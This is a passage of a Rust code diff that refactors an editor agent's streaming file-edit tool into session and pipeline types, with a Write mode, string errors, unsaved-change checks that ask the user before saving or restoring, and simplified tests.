&old_text[edit_state.last_old_text_len..]; - - let matcher = edit_state.in_progress_matcher.get_or_insert_with(|| { - let snapshot = buffer.read_with(cx, |buffer, _cx| buffer.text_snapshot()); - StreamingFuzzyMatcher::new(snapshot) - }); - - if let Some(match_range) = matcher.push(new_chunk, None) { - let anchor_range = buffer.read_with(cx, |buffer, _cx| { - buffer.anchor_range_between(match_range.clone()) - }); - diff.update(cx, |card, cx| card.reveal_range(anchor_range, cx)); - } - - edit_state.last_old_text_len = old_text_len; - } - } - } - - Ok(()) - } -} - -fn ensure_buffer_saved( - buffer: &Entity, - abs_path: &PathBuf, - tool: &StreamingEditFileTool, - cx: &mut AsyncApp, -) -> Result<(), StreamingEditFileToolOutput> { - let check_result = tool.thread.update(cx, |thread, cx| { - let last_read = thread.file_read_times.get(abs_path).copied(); - let current = buffer - .read(cx) - .file() - .and_then(|file| file.disk_state().mtime()); - let dirty = buffer.read(cx).is_dirty(); - let has_save = thread.has_tool(SaveFileTool::NAME); - let has_restore = thread.has_tool(RestoreFileFromDiskTool::NAME); - (last_read, current, dirty, has_save, has_restore) - }); - - let Ok((last_read_mtime, current_mtime, is_dirty, has_save_tool, has_restore_tool)) = - check_result - else { - return Ok(()); - }; - - if is_dirty { - let message = match (has_save_tool, has_restore_tool) { - (true, true) => { - "This file has unsaved changes. Ask the user whether they want to keep or discard those changes. \ - If they want to keep them, ask for confirmation then use the save_file tool to save the file, then retry this edit. \ - If they want to discard them, ask for confirmation then use the restore_file_from_disk tool to restore the on-disk contents, then retry this edit." - } - (true, false) => { - "This file has unsaved changes. Ask the user whether they want to keep or discard those changes. \ - If they want to keep them, ask for confirmation then use the save_file tool to save the file, then retry this edit. \ - If they want to discard them, ask the user to manually revert the file, then inform you when it's ok to proceed." - } - (false, true) => { - "This file has unsaved changes. Ask the user whether they want to keep or discard those changes. \ - If they want to keep them, ask the user to manually save the file, then inform you when it's ok to proceed. \ - If they want to discard them, ask for confirmation then use the restore_file_from_disk tool to restore the on-disk contents, then retry this edit." - } - (false, false) => { - "This file has unsaved changes. Ask the user whether they want to keep or discard those changes, \ - then ask them to save or revert the file manually and inform you when it's ok to proceed." - } - }; - return Err(StreamingEditFileToolOutput::Error { - error: message.to_string(), - }); - } - - if let (Some(last_read), Some(current)) = (last_read_mtime, current_mtime) { - if current != last_read { - return Err(StreamingEditFileToolOutput::Error { - error: "The file has been modified since you last read it. \ - Please read the file again to get the current state before editing it." - .to_string(), - }); - } - } - - Ok(()) -} - -#[derive(Debug, Serialize, Deserialize)] -#[serde(untagged)] -pub enum StreamingEditFileToolOutput { - Success { - #[serde(alias = "original_path")] - input_path: PathBuf, - new_text: String, - old_text: Arc, - #[serde(default)] - diff: String, - }, - Error { - error: String, - }, -} - -impl std::fmt::Display for StreamingEditFileToolOutput { - fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result { - match self { - StreamingEditFileToolOutput::Success { - diff, input_path, .. - } => { - if diff.is_empty() { - write!(f, "No edits were made.") - } else { - write!( - f, - "Edited {}:\n\n```diff\n{diff}\n```", - input_path.display() - ) - } - } - StreamingEditFileToolOutput::Error { error } => write!(f, "{error}"), - } - } -} - -impl From for LanguageModelToolResultContent { - fn from(output: StreamingEditFileToolOutput) -> Self { - output.to_string().into() - } -} - -pub struct StreamingEditFileTool { - thread: WeakEntity, - language_registry: Arc, - project: Entity, -} - -impl StreamingEditFileTool { - pub fn new( - project: Entity, - thread: WeakEntity, - language_registry: Arc, - ) -> Self { - Self { - project, - thread, - language_registry, - } - } - - fn authorize( - &self, - path: &PathBuf, - description: &str, - event_stream: &ToolCallEventStream, - cx: &mut App, - ) -> Task> { - super::tool_permissions::authorize_file_edit( - EditFileTool::NAME, - path, - description, - &self.thread, - event_stream, - cx, - ) - } -} - -impl AgentTool for StreamingEditFileTool { - type Input = StreamingEditFileToolInput; - type Output = StreamingEditFileToolOutput; - - const NAME: &'static str = "streaming_edit_file"; - - fn supports_input_streaming() -> bool { - true - } - - fn kind() -> acp::ToolKind { - acp::ToolKind::Edit + fn kind() -> acp::ToolKind { + acp::ToolKind::Edit } fn initial_title( @@ -816,11 +491,11 @@ impl AgentTool for StreamingEditFileTool { .read(cx) .short_full_path_for_project_path(&project_path, cx) }) - .unwrap_or(input.path) + .unwrap_or(input.path.to_string_lossy().into_owned()) .into(), Err(raw_input) => { - if let Some(input) = - serde_json::from_value::(raw_input).ok() + if let Ok(input) = + serde_json::from_value::(raw_input) { let path = input.path.unwrap_or_default(); let path = path.trim(); @@ -857,31 +532,41 @@ impl AgentTool for StreamingEditFileTool { cx: &mut App, ) -> Task> { cx.spawn(async move |cx: &mut AsyncApp| { - let mut state = StreamingEditState::Idle; - loop { - futures::select! { - partial = input.recv_partial().fuse() => { - let Some(partial_value) = partial else { break }; - if let Ok(parsed) = serde_json::from_value::(partial_value) { - state.process(parsed, &self, &event_stream, cx).await?; - } - } - _ = event_stream.cancelled_by_user().fuse() => { - return Err(StreamingEditFileToolOutput::Error { - error: "Edit cancelled by user".to_string(), - }); - } + match self + .process_streaming_edits(&mut input, &event_stream, cx) + .await + { + EditSessionResult::Completed(session) => { + self.ensure_buffer_saved(&session.buffer, cx).await; + let (new_text, diff) = session.compute_new_text_and_diff(cx).await; + Ok(StreamingEditFileToolOutput::Success { + old_text: session.old_text.clone(), + new_text, + input_path: session.input_path, + diff, + }) + } + EditSessionResult::Failed { + error, + session: Some(session), + } => { + self.ensure_buffer_saved(&session.buffer, cx).await; + let (_new_text, diff) = session.compute_new_text_and_diff(cx).await; + Err(StreamingEditFileToolOutput::Error { + error, + input_path: Some(session.input_path), + diff, + }) } + EditSessionResult::Failed { + error, + session: None, + } => Err(StreamingEditFileToolOutput::Error { + error, + input_path: None, + diff: String::new(), + }), } - let full_input = - input - .recv() - .await - .map_err(|e| StreamingEditFileToolOutput::Error { - error: format!("Failed to receive tool input: {e}"), - })?; - - state.finalize(full_input, &self, &event_stream, cx).await }) } @@ -915,207 +600,628 @@ impl AgentTool for StreamingEditFileTool { } } -fn apply_edits( - buffer: &Entity, - action_log: &Entity, - edits: &[EditOperation], - diff: &Entity, - event_stream: &ToolCallEventStream, - abs_path: &PathBuf, - cx: &mut AsyncApp, -) -> Result<()> { - let mut failed_edits = Vec::new(); - let mut ambiguous_edits = Vec::new(); - let mut resolved_edits: Vec<(Range, String)> = Vec::new(); - - let snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); - for (index, edit) in edits.iter().enumerate() { - match resolve_and_reveal_edit(buffer, diff, &snapshot, edit, cx) { - Ok((range, new_text)) => { - resolved_edits.push((range, new_text)); - } - Err(EditResolveError::NotFound) => { - failed_edits.push(index); - } - Err(EditResolveError::Ambiguous(ranges)) => { - ambiguous_edits.push((index, ranges)); - } - } - } - - if !failed_edits.is_empty() { - let indices = failed_edits - .iter() - .map(|i| i.to_string()) - .collect::>() - .join(", "); - anyhow::bail!( - "Could not find matching text for edit(s) at index(es): {}. \ - The old_text did not match any content in the file. \ - Please read the file again to get the current content.", - indices - ); - } - - if !ambiguous_edits.is_empty() { - let details: Vec = ambiguous_edits - .iter() - .map(|(index, ranges)| { - let lines = ranges - .iter() - .map(|r| (snapshot.offset_to_point(r.start).row + 1).to_string()) - .collect::>() - .join(", "); - format!("edit {}: matches at lines {}", index, lines) - }) - .collect(); - anyhow::bail!( - "Some edits matched multiple locations in the file:\n{}. \ - Please provide more context in old_text to uniquely identify the location.", - details.join("\n") - ); - } +pub struct EditSession { + abs_path: PathBuf, + input_path: PathBuf, + buffer: Entity, + old_text: Arc, + diff: Entity, + mode: StreamingEditFileMode, + parser: ToolEditParser, + pipeline: EditPipeline, + _finalize_diff_guard: Deferred>, +} - let mut edits_sorted = resolved_edits; - edits_sorted.sort_by(|a, b| a.0.start.cmp(&b.0.start)); +struct EditPipeline { + current_edit: Option, + content_written: bool, +} - if let Some((first_range, _)) = edits_sorted.first() { - let line = snapshot.offset_to_point(first_range.start).row; - event_stream.update_fields( - ToolCallUpdateFields::new() - .locations(vec![ToolCallLocation::new(abs_path).line(Some(line))]), - ); - } +enum EditPipelineEntry { + ResolvingOldText { + matcher: StreamingFuzzyMatcher, + }, + StreamingNewText { + streaming_diff: StreamingDiff, + edit_cursor: usize, + reindenter: Reindenter, + original_snapshot: text::BufferSnapshot, + }, +} - for window in edits_sorted.windows(2) { - if let [(earlier_range, _), (later_range, _)] = window - && (earlier_range.end > later_range.start || earlier_range.start == later_range.start) - { - let earlier_start_line = snapshot.offset_to_point(earlier_range.start).row + 1; - let earlier_end_line = snapshot.offset_to_point(earlier_range.end).row + 1; - let later_start_line = snapshot.offset_to_point(later_range.start).row + 1; - let later_end_line = snapshot.offset_to_point(later_range.end).row + 1; - anyhow::bail!( - "Conflicting edit ranges detected: lines {}-{} conflicts with lines {}-{}. \ - Conflicting edit ranges are not allowed, as they would overwrite each other.", - earlier_start_line, - earlier_end_line, - later_start_line, - later_end_line, - ); +impl EditPipeline { + fn new() -> Self { + Self { + current_edit: None, + content_written: false, } } - if !edits_sorted.is_empty() { - cx.update(|cx| { - buffer.update(cx, |buffer, cx| { - buffer.edit( - edits_sorted - .iter() - .map(|(range, new_text)| (range.clone(), new_text.as_str())), - None, - cx, - ); + fn ensure_resolving_old_text(&mut self, buffer: &Entity, cx: &mut AsyncApp) { + if self.current_edit.is_none() { + let snapshot = buffer.read_with(cx, |buffer, _cx| buffer.text_snapshot()); + self.current_edit = Some(EditPipelineEntry::ResolvingOldText { + matcher: StreamingFuzzyMatcher::new(snapshot), }); - action_log.update(cx, |log, cx| { - log.buffer_edited(buffer.clone(), cx); - }); - }); + } } - - Ok(()) -} - -enum EditResolveError { - NotFound, - Ambiguous(Vec>), } -/// Resolves an edit operation by finding matching text in the buffer, -/// reveals the matched range in the diff view, and returns the resolved -/// range and replacement text. -fn resolve_and_reveal_edit( - buffer: &Entity, - diff: &Entity, - snapshot: &BufferSnapshot, - edit: &EditOperation, - cx: &mut AsyncApp, -) -> std::result::Result<(Range, String), EditResolveError> { - let mut matcher = StreamingFuzzyMatcher::new(snapshot.clone()); - matcher.push(&edit.old_text, None); - let matches = matcher.finish(); - if matches.is_empty() { - return Err(EditResolveError::NotFound); - } - if matches.len() > 1 { - return Err(EditResolveError::Ambiguous(matches)); - } +impl EditSession { + async fn new( + path: PathBuf, + display_description: &str, + mode: StreamingEditFileMode, + tool: &StreamingEditFileTool, + event_stream: &ToolCallEventStream, + cx: &mut AsyncApp, + ) -> Result { + let project_path = cx.update(|cx| resolve_path(mode, &path, &tool.project, cx))?; - let range = matches.into_iter().next().expect("checked len above"); + let Some(abs_path) = cx.update(|cx| tool.project.read(cx).absolute_path(&project_path, cx)) + else { + return Err(format!( + "Worktree at '{}' does not exist", + path.to_string_lossy() + )); + }; - let anchor_range = - buffer.read_with(cx, |buffer, _cx| buffer.anchor_range_between(range.clone())); - diff.update(cx, |card, cx| card.reveal_range(anchor_range, cx)); + event_stream.update_fields( + ToolCallUpdateFields::new().locations(vec![ToolCallLocation::new(abs_path.clone())]), + ); - Ok((range, edit.new_text.clone())) -} + cx.update(|cx| tool.authorize(&path, &display_description, event_stream, cx)) + .await + .map_err(|e| e.to_string())?; -fn resolve_path( - mode: StreamingEditFileMode, - path: &PathBuf, - project: &Entity, - cx: &mut App, -) -> Result { - let project = project.read(cx); + let buffer = tool + .project + .update(cx, |project, cx| project.open_buffer(project_path, cx)) + .await + .map_err(|e| e.to_string())?; - match mode { - StreamingEditFileMode::Edit | StreamingEditFileMode::Overwrite => { - let path = project - .find_project_path(&path, cx) - .context("Can't edit file: path not found")?; + ensure_buffer_saved(&buffer, &abs_path, tool, cx)?; - let entry = project - .entry_for_path(&path, cx) - .context("Can't edit file: path not found")?; + let diff = cx.new(|cx| Diff::new(buffer.clone(), cx)); + event_stream.update_diff(diff.clone()); + let finalize_diff_guard = util::defer(Box::new({ + let diff = diff.downgrade(); + let mut cx = cx.clone(); + move || { + diff.update(&mut cx, |diff, cx| diff.finalize(cx)).ok(); + } + }) as Box); + + tool.action_log.update(cx, |log, cx| match mode { + StreamingEditFileMode::Write => log.buffer_created(buffer.clone(), cx), + StreamingEditFileMode::Edit => log.buffer_read(buffer.clone(), cx), + }); + + let old_snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); + let old_text = cx + .background_spawn({ + let old_snapshot = old_snapshot.clone(); + async move { Arc::new(old_snapshot.text()) } + }) + .await; + + Ok(Self { + abs_path, + input_path: path, + buffer, + old_text, + diff, + mode, + parser: ToolEditParser::default(), + pipeline: EditPipeline::new(), + _finalize_diff_guard: finalize_diff_guard, + }) + } + + async fn finalize( + &mut self, + input: StreamingEditFileToolInput, + tool: &StreamingEditFileTool, + event_stream: &ToolCallEventStream, + cx: &mut AsyncApp, + ) -> Result<(), String> { + match input.mode { + StreamingEditFileMode::Write => { + let content = input + .content + .ok_or_else(|| "'content' field is required for write mode".to_string())?; + + let events = self.parser.finalize_content(&content); + self.process_events(&events, tool, event_stream, cx)?; + } + StreamingEditFileMode::Edit => { + let edits = input + .edits + .ok_or_else(|| "'edits' field is required for edit mode".to_string())?; + let events = self.parser.finalize_edits(&edits); + self.process_events(&events, tool, event_stream, cx)?; + + if log::log_enabled!(log::Level::Debug) { + log::debug!("Got edits:"); + for edit in &edits { + log::debug!( + " old_text: '{}', new_text: '{}'", + edit.old_text.replace('\n', "\\n"), + edit.new_text.replace('\n', "\\n") + ); + } + } + } + } + Ok(()) + } + + async fn compute_new_text_and_diff(&self, cx: &mut AsyncApp) -> (String, String) { + let new_snapshot = self.buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); + let (new_text, unified_diff) = cx + .background_spawn({ + let new_snapshot = new_snapshot.clone(); + let old_text = self.old_text.clone(); + async move { + let new_text = new_snapshot.text(); + let diff = language::unified_diff(&old_text, &new_text); + (new_text, diff) + } + }) + .await; + (new_text, unified_diff) + } - anyhow::ensure!(entry.is_file(), "Can't edit file: path is a directory"); - Ok(path) + fn process( + &mut self, + partial: StreamingEditFileToolPartialInput, + tool: &StreamingEditFileTool, + event_stream: &ToolCallEventStream, + cx: &mut AsyncApp, + ) -> Result<(), String> { + match &self.mode { + StreamingEditFileMode::Write => { + if let Some(content) = &partial.content { + let events = self.parser.push_content(content); + self.process_events(&events, tool, event_stream, cx)?; + } + } + StreamingEditFileMode::Edit => { + if let Some(edits) = partial.edits { + let events = self.parser.push_edits(&edits); + self.process_events(&events, tool, event_stream, cx)?; + } + } } + Ok(()) + } - StreamingEditFileMode::Create => { - if let Some(path) = project.find_project_path(&path, cx) { - anyhow::ensure!( - project.entry_for_path(&path, cx).is_none(), - "Can't create file: file already exists" - ); + fn process_events( + &mut self, + events: &[ToolEditEvent], + tool: &StreamingEditFileTool, + event_stream: &ToolCallEventStream, + cx: &mut AsyncApp, + ) -> Result<(), String> { + for event in events { + match event { + ToolEditEvent::ContentChunk { chunk } => { + let (buffer_id, buffer_len) = self + .buffer + .read_with(cx, |buffer, _cx| (buffer.remote_id(), buffer.len())); + let edit_range = if self.pipeline.content_written { + buffer_len..buffer_len + } else { + 0..buffer_len + }; + + agent_edit_buffer( + &self.buffer, + [(edit_range, chunk.as_str())], + &tool.action_log, + cx, + ); + cx.update(|cx| { + tool.set_agent_location( + self.buffer.downgrade(), + text::Anchor::max_for_buffer(buffer_id), + cx, + ); + }); + self.pipeline.content_written = true; + } + + ToolEditEvent::OldTextChunk { + chunk, done: false, .. + } => { + log::debug!("old_text_chunk: done=false, chunk='{}'", chunk); + self.pipeline.ensure_resolving_old_text(&self.buffer, cx); + + if let Some(EditPipelineEntry::ResolvingOldText { matcher }) = + &mut self.pipeline.current_edit + && !chunk.is_empty() + { + if let Some(match_range) = matcher.push(chunk, None) { + let anchor_range = self.buffer.read_with(cx, |buffer, _cx| { + buffer.anchor_range_outside(match_range.clone()) + }); + self.diff + .update(cx, |diff, cx| diff.reveal_range(anchor_range, cx)); + + cx.update(|cx| { + let position = self.buffer.read(cx).anchor_before(match_range.end); + tool.set_agent_location(self.buffer.downgrade(), position, cx); + }); + } + } + } + + ToolEditEvent::OldTextChunk { + edit_index, + chunk, + done: true, + } => { + log::debug!("old_text_chunk: done=true, chunk='{}'", chunk); + + self.pipeline.ensure_resolving_old_text(&self.buffer, cx); + + let Some(EditPipelineEntry::ResolvingOldText { matcher }) = + &mut self.pipeline.current_edit + else { + continue; + }; + + if !chunk.is_empty() { + matcher.push(chunk, None); + } + let range = extract_match(matcher.finish(), &self.buffer, edit_index, cx)?; + + let anchor_range = self + .buffer + .read_with(cx, |buffer, _cx| buffer.anchor_range_outside(range.clone())); + self.diff + .update(cx, |diff, cx| diff.reveal_range(anchor_range, cx)); + + let snapshot = self.buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); + + let line = snapshot.offset_to_point(range.start).row; + event_stream.update_fields( + ToolCallUpdateFields::new().locations(vec![ + ToolCallLocation::new(&self.abs_path).line(Some(line)), + ]), + ); + + let buffer_indent = snapshot.line_indent_for_row(line); + let query_indent = text::LineIndent::from_iter( + matcher + .query_lines() + .first() + .map(|s| s.as_str()) + .unwrap_or("") + .chars(), + ); + let indent_delta = compute_indent_delta(buffer_indent, query_indent); + + let old_text_in_buffer = + snapshot.text_for_range(range.clone()).collect::(); + + log::debug!( + "edit[{}] old_text matched at {}..{}: {:?}", + edit_index, + range.start, + range.end, + old_text_in_buffer, + ); + + let text_snapshot = self + .buffer + .read_with(cx, |buffer, _cx| buffer.text_snapshot()); + self.pipeline.current_edit = Some(EditPipelineEntry::StreamingNewText { + streaming_diff: StreamingDiff::new(old_text_in_buffer), + edit_cursor: range.start, + reindenter: Reindenter::new(indent_delta), + original_snapshot: text_snapshot, + }); + + cx.update(|cx| { + let position = self.buffer.read(cx).anchor_before(range.end); + tool.set_agent_location(self.buffer.downgrade(), position, cx); + }); + } + + ToolEditEvent::NewTextChunk { + chunk, done: false, .. + } => { + log::debug!("new_text_chunk: done=false, chunk='{}'", chunk); + + let Some(EditPipelineEntry::StreamingNewText { + streaming_diff, + edit_cursor, + reindenter, + original_snapshot, + .. + }) = &mut self.pipeline.current_edit + else { + continue; + }; + + let reindented = reindenter.push(chunk); + if reindented.is_empty() { + continue; + } + + let char_ops = streaming_diff.push_new(&reindented); + apply_char_operations( + &char_ops, + &self.buffer, + original_snapshot, + edit_cursor, + &tool.action_log, + cx, + ); + + let position = original_snapshot.anchor_before(*edit_cursor); + cx.update(|cx| { + tool.set_agent_location(self.buffer.downgrade(), position, cx); + }); + } + + ToolEditEvent::NewTextChunk { + chunk, done: true, .. + } => { + log::debug!("new_text_chunk: done=true, chunk='{}'", chunk); + + let Some(EditPipelineEntry::StreamingNewText { + mut streaming_diff, + mut edit_cursor, + mut reindenter, + original_snapshot, + }) = self.pipeline.current_edit.take() + else { + continue; + }; + + // Flush any remaining reindent buffer + final chunk. + let mut final_text = reindenter.push(chunk); + final_text.push_str(&reindenter.finish()); + + log::debug!("new_text_chunk: done=true, final_text='{}'", final_text); + + if !final_text.is_empty() { + let char_ops = streaming_diff.push_new(&final_text); + apply_char_operations( + &char_ops, + &self.buffer, + &original_snapshot, + &mut edit_cursor, + &tool.action_log, + cx, + ); + } + + let remaining_ops = streaming_diff.finish(); + apply_char_operations( + &remaining_ops, + &self.buffer, + &original_snapshot, + &mut edit_cursor, + &tool.action_log, + cx, + ); + + let position = original_snapshot.anchor_before(edit_cursor); + cx.update(|cx| { + tool.set_agent_location(self.buffer.downgrade(), position, cx); + }); + } + } + } + Ok(()) + } +} + +fn apply_char_operations( + ops: &[CharOperation], + buffer: &Entity, + snapshot: &text::BufferSnapshot, + edit_cursor: &mut usize, + action_log: &Entity, + cx: &mut AsyncApp, +) { + for op in ops { + match op { + CharOperation::Insert { text } => { + let anchor = snapshot.anchor_after(*edit_cursor); + agent_edit_buffer(&buffer, [(anchor..anchor, text.as_str())], action_log, cx); + } + CharOperation::Delete { bytes } => { + let delete_end = *edit_cursor + bytes; + let anchor_range = snapshot.anchor_range_inside(*edit_cursor..delete_end); + agent_edit_buffer(&buffer, [(anchor_range, "")], action_log, cx); + *edit_cursor = delete_end; + } + CharOperation::Keep { bytes } => { + *edit_cursor += bytes; + } + } + } +} + +fn extract_match( + matches: Vec>, + buffer: &Entity, + edit_index: &usize, + cx: &mut AsyncApp, +) -> Result, String> { + match matches.len() { + 0 => Err(format!( + "Could not find matching text for edit at index {}. \ + The old_text did not match any content in the file. \ + Please read the file again to get the current content.", + edit_index, + )), + 1 => Ok(matches.into_iter().next().unwrap()), + _ => { + let snapshot = buffer.read_with(cx, |buffer, _cx| buffer.snapshot()); + let lines = matches + .iter() + .map(|r| (snapshot.offset_to_point(r.start).row + 1).to_string()) + .collect::>() + .join(", "); + Err(format!( + "Edit {} matched multiple locations in the file at lines: {}. \ + Please provide more context in old_text to uniquely \ + identify the location.", + edit_index, lines + )) + } + } +} + +/// Edits a buffer and reports the edit to the action log in the same effect +/// cycle. This ensures the action log's subscription handler sees the version +/// already updated by `buffer_edited`, so it does not misattribute the agent's +/// edit as a user edit. +fn agent_edit_buffer( + buffer: &Entity, + edits: I, + action_log: &Entity, + cx: &mut AsyncApp, +) where + I: IntoIterator, T)>, + S: ToOffset, + T: Into>, +{ + cx.update(|cx| { + buffer.update(cx, |buffer, cx| { + buffer.edit(edits, None, cx); + }); + action_log.update(cx, |log, cx| log.buffer_edited(buffer.clone(), cx)); + }); +} + +fn ensure_buffer_saved( + buffer: &Entity, + abs_path: &PathBuf, + tool: &StreamingEditFileTool, + cx: &mut AsyncApp, +) -> Result<(), String> { + let last_read_mtime = tool + .action_log + .read_with(cx, |log, _| log.file_read_time(abs_path)); + let check_result = tool.thread.read_with(cx, |thread, cx| { + let current = buffer + .read(cx) + .file() + .and_then(|file| file.disk_state().mtime()); + let dirty = buffer.read(cx).is_dirty(); + let has_save = thread.has_tool(SaveFileTool::NAME); + let has_restore = thread.has_tool(RestoreFileFromDiskTool::NAME); + (current, dirty, has_save, has_restore) + }); + + let Ok((current_mtime, is_dirty, has_save_tool, has_restore_tool)) = check_result else { + return Ok(()); + }; + + if is_dirty { + let message = match (has_save_tool, has_restore_tool) { + (true, true) => { + "This file has unsaved changes. Ask the user whether they want to keep or discard those changes. \ + If they want to keep them, ask for confirmation then use the save_file tool to save the file, then retry this edit. \ + If they want to discard them, ask for confirmation then use the restore_file_from_disk tool to restore the on-disk contents, then retry this edit." + } + (true, false) => { + "This file has unsaved changes. Ask the user whether they want to keep or discard those changes. \ + If they want to keep them, ask for confirmation then use the save_file tool to save the file, then retry this edit. \ + If they want to discard them, ask the user to manually revert the file, then inform you when it's ok to proceed." + } + (false, true) => { + "This file has unsaved changes. Ask the user whether they want to keep or discard those changes. \ + If they want to keep them, ask the user to manually save the file, then inform you when it's ok to proceed. \ + If they want to discard them, ask for confirmation then use the restore_file_from_disk tool to restore the on-disk contents, then retry this edit." + } + (false, false) => { + "This file has unsaved changes. Ask the user whether they want to keep or discard those changes, \ + then ask them to save or revert the file manually and inform you when it's ok to proceed." + } + }; + return Err(message.to_string()); + } + + if let (Some(last_read), Some(current)) = (last_read_mtime, current_mtime) { + if current != last_read { + return Err("The file has been modified since you last read it. \ + Please read the file again to get the current state before editing it." + .to_string()); + } + } + + Ok(()) +} + +fn resolve_path( + mode: StreamingEditFileMode, + path: &PathBuf, + project: &Entity, + cx: &mut App, +) -> Result { + let project = project.read(cx); + + match mode { + StreamingEditFileMode::Edit => { + let path = project + .find_project_path(&path, cx) + .ok_or_else(|| "Can't edit file: path not found".to_string())?; + + let entry = project + .entry_for_path(&path, cx) + .ok_or_else(|| "Can't edit file: path not found".to_string())?; + + if entry.is_file() { + Ok(path) + } else { + Err("Can't edit file: path is a directory".to_string()) + } + } + StreamingEditFileMode::Write => { + if let Some(path) = project.find_project_path(&path, cx) + && let Some(entry) = project.entry_for_path(&path, cx) + { + if entry.is_file() { + return Ok(path); + } else { + return Err("Can't write to file: path is a directory".to_string()); + } } - let parent_path = path.parent().context("Can't create file: incorrect path")?; + let parent_path = path + .parent() + .ok_or_else(|| "Can't create file: incorrect path".to_string())?; let parent_project_path = project.find_project_path(&parent_path, cx); let parent_entry = parent_project_path .as_ref() .and_then(|path| project.entry_for_path(path, cx)) - .context("Can't create file: parent directory doesn't exist")?; + .ok_or_else(|| "Can't create file: parent directory doesn't exist")?; - anyhow::ensure!( - parent_entry.is_dir(), - "Can't create file: parent is not a directory" - ); + if !parent_entry.is_dir() { + return Err("Can't create file: parent is not a directory".to_string()); + } let file_name = path .file_name() .and_then(|file_name| file_name.to_str()) .and_then(|file_name| RelPath::unix(file_name).ok()) - .context("Can't create file: invalid filename")?; + .ok_or_else(|| "Can't create file: invalid filename".to_string())?; let new_file_path = parent_project_path.map(|parent| ProjectPath { path: parent.path.join(file_name), ..parent }); - new_file_path.context("Can't create file") + new_file_path.ok_or_else(|| "Can't create file".to_string()) } } } @@ -1137,42 +1243,17 @@ mod tests { #[gpui::test] async fn test_streaming_edit_create_file(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree("/root", json!({"dir": {}})).await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - + let (tool, _project, _action_log, _fs, _thread) = setup_test(cx, json!({"dir": {}})).await; let result = cx .update(|cx| { - let input = StreamingEditFileToolInput { - display_description: "Create new file".into(), - path: "root/dir/new_file.txt".into(), - mode: StreamingEditFileMode::Create, - content: Some("Hello, World!".into()), - edits: None, - }; - Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )) - .run( - ToolInput::resolved(input), + tool.clone().run( + ToolInput::resolved(StreamingEditFileToolInput { + display_description: "Create new file".into(), + path: "root/dir/new_file.txt".into(), + mode: StreamingEditFileMode::Write, + content: Some("Hello, World!".into()), + edits: None, + }), ToolCallEventStream::test().0, cx, ) @@ -1188,43 +1269,18 @@ mod tests { #[gpui::test] async fn test_streaming_edit_overwrite_file(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree("/root", json!({"file.txt": "old content"})) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "old content"})).await; let result = cx .update(|cx| { - let input = StreamingEditFileToolInput { - display_description: "Overwrite file".into(), - path: "root/file.txt".into(), - mode: StreamingEditFileMode::Overwrite, - content: Some("new content".into()), - edits: None, - }; - Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )) - .run( - ToolInput::resolved(input), + tool.clone().run( + ToolInput::resolved(StreamingEditFileToolInput { + display_description: "Overwrite file".into(), + path: "root/file.txt".into(), + mode: StreamingEditFileMode::Write, + content: Some("new content".into()), + edits: None, + }), ToolCallEventStream::test().0, cx, ) @@ -1243,51 +1299,21 @@ mod tests { #[gpui::test] async fn test_streaming_edit_granular_edits(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "line 1\nline 2\nline 3\n" - }), - ) - .await; - let project = Project::test(fs.clone(), [path!("/root").as_ref()], cx).await; - let language_registry = project.read_with(cx, |project, _cx| project.languages().clone()); - let context_server_registry = - cx.new(|cx| ContextServerRegistry::new(project.read(cx).context_server_store(), cx)); - let model = Arc::new(FakeLanguageModel::default()); - let thread = cx.new(|cx| { - crate::Thread::new( - project.clone(), - cx.new(|_cx| ProjectContext::default()), - context_server_registry, - Templates::new(), - Some(model), - cx, - ) - }); - + let (tool, _project, _action_log, _fs, _thread) = + setup_test(cx, json!({"file.txt": "line 1\nline 2\nline 3\n"})).await; let result = cx .update(|cx| { - let input = StreamingEditFileToolInput { - display_description: "Edit lines".into(), - path: "root/file.txt".into(), - mode: StreamingEditFileMode::Edit, - content: None, - edits: Some(vec![EditOperation { - old_text: "line 2".into(), - new_text: "modified line 2".into(), - }]), - }; - Arc::new(StreamingEditFileTool::new( - project.clone(), - thread.downgrade(), - language_registry, - )) - .run( - ToolInput::resolved(input), + tool.clone().run( + ToolInput::resolved(StreamingEditFileToolInput { + display_description: "Edit lines".into(), + path: "root/file.txt".into(), + mode: StreamingEditFileMode::Edit, + content: None, + edits: Some(vec![Edit { + old_text: "line 2".into(), + new_text: "modified line 2".into(), + }]), + }), ToolCallEventStream::test().0, cx, ) @@ -1301,58 +1327,31 @@ mod tests { } #[gpui::test] - async fn test_streaming_edit_multiple_nonoverlapping_edits(cx: &mut TestAppContext) { - init_test(cx); - - let fs = project::FakeFs::new(cx.executor()); - fs.insert_tree( - "/root", - json!({ - "file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n" - }), + async fn test_streaming_edit_multiple_edits(cx: &mut TestAppContext) { + let (tool, _project, _action_log, _fs, _thread) = setup_test( + cx, + json!({"file.txt": "line 1\nline 2\nline 3\nline 4\nline 5\n"}), ) 